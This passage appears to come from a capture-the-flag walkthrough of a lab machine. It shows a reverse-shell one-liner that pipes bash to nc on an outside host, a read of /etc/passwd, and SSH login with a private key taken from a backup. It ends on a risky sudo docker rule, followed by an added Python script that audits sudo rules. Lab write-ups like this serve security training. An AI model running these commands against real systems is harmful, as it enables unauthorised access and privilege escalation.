4 shell

There is some AV / firewall on the box that deletes the PHP shell every time it is uploaded.

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
noah:x:1000:1000:Noah:/home/noah:/bin/bash

Since the shell keeps dying and the .php file keeps getting deleted, I set up a stable bash connection using:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.2 443 >/tmp/f

While enumerating, I find home.tar.gz in /var/backups:

cp home.tar.gz /tmp
tar -xf home.tar.gz

=> Inside the archive we find an .ssh directory containing an id_rsa private key.

$ chmod 600 id_rsa
$ ssh -i id_rsa noah@10.10.10.230
noah@thenotebook:~$ whoami;id
noah
uid=1000(noah) gid=1000(noah) groups=1000(noah)

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
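The `sudo -l` output above is exactly what a host-hardening audit should catch: a NOPASSWD rule with a trailing wildcard on a binary that runs as root. As an added example (not from the original writeup), here is a small Python checker that parses `sudo -l` output in the format shown and reports the properties that make such a rule risky; the sample output, including the benign second rule, is constructed.

```python
import re

# Constructed sample in the shape of `sudo -l` output; the first rule mirrors the writeup,
# the second is a benign rule added for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
    (root) /usr/bin/systemctl restart webapp
"""

# One rule line: "(runas) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Binaries that effectively grant a root shell when sudo lets a user pass their own arguments.
# docker is here because `docker exec` runs with the daemon's (root) privileges.
SHELL_EQUIVALENT_BINARIES = {"docker", "bash", "sh"}


def parse_rules(output):
    """Return the command rules listed after 'may run the following commands'."""
    rules, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
            rules.append({"runas": m.group("runas"), "tags": tags, "cmd": m.group("cmd").strip()})
    return rules


def audit(rule):
    """Return a list of findings for one rule; an empty list means nothing flagged."""
    findings, cmd = [], rule["cmd"]
    binary = cmd.split()[0].rsplit("/", 1)[-1]
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD: no re-authentication before privileged execution")
    if any(ch in cmd for ch in "*?["):
        findings.append("wildcard in command spec: the invoking user chooses the matched arguments")
    if binary in SHELL_EQUIVALENT_BINARIES:
        findings.append(f"{binary}: can spawn a shell, so the rule is equivalent to full root")
    return findings


def audit_output(output):
    """Map each rule's command to its findings; fix flagged rules with exact commands and no wildcards."""
    return {r["cmd"]: audit(r) for r in parse_rules(output)}
```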
